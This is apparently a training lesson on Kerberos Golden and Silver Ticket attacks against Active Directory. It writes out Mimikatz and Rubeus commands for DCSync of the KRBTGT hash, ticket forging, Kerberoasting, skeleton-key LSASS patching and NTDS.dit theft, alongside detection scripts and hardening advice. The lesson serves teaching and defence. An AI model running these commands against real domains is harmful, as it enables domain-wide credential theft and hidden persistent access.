Lesson 2: Golden & Silver Ticket Attacks
Advanced ticket-based attack techniques and persistence mechanisms
Learning Objectives
By the end of this lesson, you will be able to:
- Understand Golden and Silver ticket attack methodologies
- Master KRBTGT account exploitation techniques
- Execute service account abuse for Silver tickets
- Implement advanced persistence mechanisms
- Analyze ticket-based attack artifacts
- Deploy effective detection and prevention strategies
Golden Ticket Attack
What is a Golden Ticket?
A Golden Ticket is a forged Ticket Granting Ticket (TGT) that lets an attacker impersonate any user in the domain. The attack requires compromising the KRBTGT account, whose key is used to encrypt and sign every TGT the domain issues.
Golden Ticket Key Characteristics:
- Domain-wide Access: Can access any service in the domain
- Arbitrary Privileges: Can impersonate any user or group
- Persistent Access: Works even after password changes
- Stealth Operation: Difficult to detect without proper monitoring
Golden Ticket Attack Process
KRBTGT Compromise
Obtain the KRBTGT account password hash
Methods:
- DCSync attack (requires Domain Admin privileges)
- NTDS.dit extraction and cracking
- Memory dumping from Domain Controller
- Volume Shadow Copy exploitation
Ticket Generation
Create forged TGT with desired privileges
Required Information:
- Domain SID
- KRBTGT password hash
- Target user account
- Desired group memberships
Ticket Usage
Use Golden Ticket for domain access
Capabilities:
- Access any service in domain
- Impersonate any user account
- Maintain persistent access
- Bypass most security controls
Golden Ticket Implementation
Using Mimikatz
Traditional Golden Ticket creation with Mimikatz
Command Syntax:
# Extract KRBTGT hash
lsadump::dcsync /domain:domain.com /user:krbtgt
# Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi
# Use Golden Ticket
kerberos::ptt golden.kirbi
Using Rubeus
Modern C# implementation with Rubeus
Command Syntax:
# Create Golden Ticket
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /ticket:golden.kirbi
# Use Golden Ticket
Rubeus.exe ptt /ticket:golden.kirbi
# Create with custom groups
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /groups:512,513,518,519,520
Silver Ticket Attack
What is a Silver Ticket?
A Silver Ticket is a forged service ticket, encrypted with the target service account's key, that grants access to one specific service without ever requesting a ticket from the Ticket Granting Service (TGS). The attack requires compromising that service account's password or hash.
Silver Ticket Key Characteristics:
- Service-specific: Only works for the targeted service
- Direct Access: Bypasses TGS authentication
- Limited Scope: Cannot access other services
- Faster Execution: No TGS communication required
Silver Ticket Attack Process
Service Account Compromise
Obtain the service account password hash
Methods:
- Kerberoasting attack
- Password cracking
- Memory dumping
- Credential theft
Service Ticket Creation
Generate forged service ticket for target service
Required Information:
- Service account password hash
- Service Principal Name (SPN)
- Target service details
- User account for impersonation
Direct Service Access
Use Silver Ticket to access service directly
Capabilities:
- Direct service authentication
- Bypass TGS requirements
- Impersonate user accounts
- Access service resources
Silver Ticket Implementation
Using Mimikatz
Traditional Silver Ticket creation
Command Syntax:
# Create Silver Ticket for CIFS service
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /target:server01.domain.com /service:cifs /rc4:service_hash /ticket:silver.kirbi
# Create Silver Ticket for HTTP service
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /target:web01.domain.com /service:http /rc4:service_hash /ticket:silver.kirbi
# Use Silver Ticket
kerberos::ptt silver.kirbi
Using Rubeus
Modern Silver Ticket implementation
Command Syntax:
# Create Silver Ticket
Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs/server01.domain.com /ticket:silver.kirbi
# Use Silver Ticket
Rubeus.exe ptt /ticket:silver.kirbi
# Create for multiple services
Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs,ldap,http/server01.domain.com
Advanced Persistence Techniques
Ticket-based Persistence
Ticket Renewal
Extending ticket validity for long-term access
Implementation:
- Set extended ticket lifetime
- Use ticket renewal mechanisms
- Automate ticket refresh
- Maintain continuous access
# Rubeus ticket renewal
Rubeus.exe renew /ticket:golden.kirbi
# Mimikatz ticket renewal
kerberos::purge
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:renewed.kirbi
User Impersonation
Creating tickets for specific user accounts
Implementation:
- Target high-privilege accounts
- Include multiple group memberships
- Set appropriate ticket flags
- Maintain stealth operations
# Create ticket for specific user with custom groups
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:target_user /groups:512,513,518,519,520 /ticket:custom.kirbi
Skeleton Key
Installing backdoor authentication mechanism
Implementation:
- Patch LSASS with skeleton key
- Set universal password
- Maintain normal authentication
- Enable backdoor access
# Mimikatz skeleton key
privilege::debug
misc::skeleton
# Effect: while the patched LSASS process on the DC is running (until reboot), every domain
# account also authenticates with the skeleton key password (Mimikatz default: "mimikatz")
# in addition to its real password, so normal logons keep working and nothing is reset.
Detection and Analysis
Ticket Attack Indicators
Event Log Analysis
Windows Event Log indicators of ticket attacks
Key Events:
- Event ID 4624 - Successful logon with unusual source
- Event ID 4768 - TGS ticket requested
- Event ID 4769 - Service ticket requested
- Event ID 4771 - Kerberos pre-authentication failed
Network Traffic Analysis
Network-based detection of ticket attacks
Traffic Patterns:
- Unusual Kerberos traffic patterns
- Direct service access without TGS
- Multiple failed authentication attempts
- Anomalous ticket lifetimes
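The two correlation checks that the event-log and traffic sections above describe, written out as an added example (this is not code from the lesson): a Golden Ticket produces service-ticket requests (4769) with no preceding TGT request (4768) from that user and source, and typically with RC4 encryption; a Silver Ticket produces a Kerberos network logon (4624) on the target host with no 4769 on the DC. The event records and field names are constructed and simplified from the Windows event XML.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). DC_EVENTS are from a domain controller's
# Security log, HOST_EVENTS from member server server01's Security log.
DC_EVENTS = [
    {"id": 4768, "user": "alice", "ip": "10.0.0.5", "etype": "0x12", "time": "2024-05-01T08:00:00"},
    {"id": 4769, "user": "alice", "ip": "10.0.0.5", "spn": "cifs/server01.domain.com",
     "etype": "0x12", "time": "2024-05-01T08:00:05"},
    # 4769 with no earlier 4768 from this user/IP, and RC4 encryption: forged-TGT pattern
    {"id": 4769, "user": "Administrator", "ip": "10.0.0.9", "spn": "cifs/server01.domain.com",
     "etype": "0x17", "time": "2024-05-01T09:00:00"},
]
HOST_EVENTS = [
    {"id": 4624, "user": "alice", "ip": "10.0.0.5", "package": "Kerberos", "logon_type": 3,
     "time": "2024-05-01T08:00:06"},
    # Kerberos network logon with no matching 4769 on the DC: forged service-ticket pattern
    {"id": 4624, "user": "svc_backup", "ip": "10.0.0.9", "package": "Kerberos", "logon_type": 3,
     "time": "2024-05-01T10:00:00"},
]

def _t(event):
    return datetime.fromisoformat(event["time"])

def tgs_without_tgt(dc_events, window=timedelta(hours=10)):
    """Golden Ticket indicator: a 4769 for a user/IP pair with no 4768 in the preceding
    window (default: the 10-hour maximum TGT lifetime). A forged TGT is never requested
    from the KDC, so no 4768 exists. Merge the logs of every DC first, or TGTs issued
    by another DC will be reported as missing."""
    tgts = [e for e in dc_events if e["id"] == 4768]
    return [e for e in dc_events if e["id"] == 4769 and not any(
        t["user"] == e["user"] and t["ip"] == e["ip"]
        and timedelta(0) <= _t(e) - _t(t) <= window for t in tgts)]

def unexpected_etype(dc_events, allowed=frozenset({"0x11", "0x12"})):
    """Tickets issued with an encryption type outside the AES set. 0x17 is RC4-HMAC, which
    Mimikatz and Rubeus use when given an NT hash; an AES-only domain should see none."""
    return [e for e in dc_events if e["id"] in (4768, 4769) and e["etype"] not in allowed]

def logon_without_tgs(host_events, dc_events, host, window=timedelta(minutes=10)):
    """Silver Ticket indicator: a Kerberos network logon (4624, type 3) on `host` whose user
    has no recent 4769 for an SPN on that host. The forged ticket goes straight to the
    service, so the DC never sees a request."""
    tgs = [e for e in dc_events if e["id"] == 4769
           and e["spn"].split("/", 1)[1].lower() == host.lower()]
    return [h for h in host_events if h["id"] == 4624 and h["package"] == "Kerberos"
            and h["logon_type"] == 3 and not any(
                s["user"] == h["user"] and timedelta(0) <= _t(h) - _t(s) <= window for s in tgs)]
```

Both checks need the DC logs forwarded to a central store; a host-only or single-DC view cannot tell a forged ticket from one issued elsewhere.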
Behavioral Analysis
User and system behavior indicators
Behavioral Signs:
- Privilege escalation patterns
- Unusual service access
- Lateral movement indicators
- Persistence mechanism deployment
Detection Tools and Techniques
Microsoft Security Tools
- Windows Defender ATP: Advanced threat protection
- Azure Sentinel: SIEM and security analytics
- Advanced Threat Analytics: Behavioral analysis
- Security and Compliance Center: Unified security management
Third-party Solutions
- Splunk: Security information and event management
- QRadar: Security intelligence platform
- Carbon Black: Endpoint detection and response
- CrowdStrike: Cloud-native security platform
Defense Strategies
Prevention and Mitigation
KRBTGT Security
Implementation:
- Regular KRBTGT password rotation
- Strong password policies
- Monitoring KRBTGT access
- Restricted administrative access
- Regular security assessments
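Why the KRBTGT rotation listed above must be done twice, as an added model (not code from the lesson): a domain controller accepts a TGT encrypted with either the current KRBTGT key or the previous one, so a Golden Ticket forged with a stolen hash survives the first reset and is only rejected after the second. The class and key values are constructed for illustration.

```python
import os

class KrbtgtKeyState:
    """Model of how a DC validates TGTs against the KRBTGT account's keys. One key of
    history is kept so tickets issued just before a reset keep working; that same
    history keeps a forged TGT valid until the second reset."""
    def __init__(self):
        self.current = os.urandom(16)   # stands in for the key derived from the password
        self.previous = None

    def reset_password(self):
        """One KRBTGT reset: the current key moves to history, a fresh key becomes current.
        In production, let AD replication complete between the two resets, or DCs still
        holding the older key will reject legitimate tickets."""
        self.previous, self.current = self.current, os.urandom(16)

    def accepts_tgt(self, ticket_key):
        return ticket_key in (self.current, self.previous)

def forged_tgt_survives(resets):
    """Is a TGT forged with the pre-reset KRBTGT key still accepted after `resets` resets?"""
    kdc = KrbtgtKeyState()
    stolen_key = kdc.current          # what a DCSync of krbtgt would have yielded
    for _ in range(resets):
        kdc.reset_password()
    return kdc.accepts_tgt(stolen_key)
```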
Ticket Security
Implementation:
- Short ticket lifetimes
- Ticket renewal restrictions
- Anomalous ticket detection
- Service account hardening
- Regular ticket monitoring
Monitoring & Detection
Implementation:
- Comprehensive event logging
- Real-time alerting systems
- Behavioral analysis tools
- Network traffic monitoring
- SIEM integration
Configuration Hardening
Implementation:
- Secure service account management
- Privilege escalation controls
- Network segmentation
- Access control restrictions
- Regular security updates
Hands-On Exercise
Exercise: Golden and Silver Ticket Attack Simulation
Objective: Simulate Golden and Silver ticket attacks in a controlled environment and implement detection mechanisms.
Steps:
- Environment Setup
Prepare the attack environment:
# Verify domain controller access
klist
# Check current tickets
Rubeus.exe klist
# Verify domain information
whoami /all
- KRBTGT Hash Extraction
Extract KRBTGT account hash:
# Using DCSync (requires Domain Admin)
lsadump::dcsync /domain:domain.com /user:krbtgt
# Alternative: Volume Shadow Copy
vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
- Golden Ticket Creation
Create and use Golden Ticket:
# Create Golden Ticket
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /ticket:golden.kirbi
# Use Golden Ticket
Rubeus.exe ptt /ticket:golden.kirbi
# Verify ticket usage
Rubeus.exe klist
dir \\server01.domain.com\C$
- Silver Ticket Creation
Create and use Silver Ticket:
# Get service account hash (from Kerberoasting)
Rubeus.exe kerberoast /user:sqlservice /ticket:service.kirbi
# Create Silver Ticket
Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs/server01.domain.com
# Use Silver Ticket
Rubeus.exe ptt /ticket:silver.kirbi
- Detection Implementation
Implement detection mechanisms on the domain controller:
# Monitor Kerberos ticket events (4768 TGT, 4769 service ticket) issued with RC4 (0x17),
# which is what forged tickets built from an NT hash use in a domain that expects AES
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768,4769} | Where-Object {$_.Message -like "*Ticket Encryption Type:*0x17*"}
# Check for anomalous ticket lifetimes: the event log does not record them, so inspect
# the cached tickets on a suspect host (a forged TGT far exceeds the 10-hour default)
klist
Deliverables:
- Golden Ticket attack demonstration
- Silver Ticket attack demonstration
- Detection mechanism implementation
- Security recommendations report